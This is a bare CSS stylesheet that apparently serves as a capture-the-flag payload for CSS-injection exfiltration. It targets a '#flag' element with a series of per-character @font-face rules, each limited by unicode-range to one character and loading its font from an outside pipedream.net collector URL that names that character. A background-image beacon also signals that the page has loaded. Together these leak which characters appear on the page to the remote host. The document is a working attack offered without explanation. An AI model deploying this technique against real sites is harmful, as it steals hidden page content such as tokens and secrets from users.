body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W33')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w33,p98w33,p106w33,p112w33,p115w33,p121w33,p122w33,p48w33,p49w33,p52w33,p53w33,p55w33,p125w33,monospace;width:33ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W33');unicode-range:U+0061}
@font-face{font-family:p98w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W33');unicode-range:U+0062}
@font-face{font-family:p106w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W33');unicode-range:U+006A}
@font-face{font-family:p112w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W33');unicode-range:U+0070}
@font-face{font-family:p115w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W33');unicode-range:U+0073}
@font-face{font-family:p121w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W33');unicode-range:U+0079}
@font-face{font-family:p122w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W33');unicode-range:U+007A}
@font-face{font-family:p48w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W33');unicode-range:U+0030}
@font-face{font-family:p49w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W33');unicode-range:U+0031}
@font-face{font-family:p52w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W33');unicode-range:U+0034}
@font-face{font-family:p53w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W33');unicode-range:U+0035}
@font-face{font-family:p55w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W33');unicode-range:U+0037}
@font-face{font-family:p125w33;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W33');unicode-range:U+007D}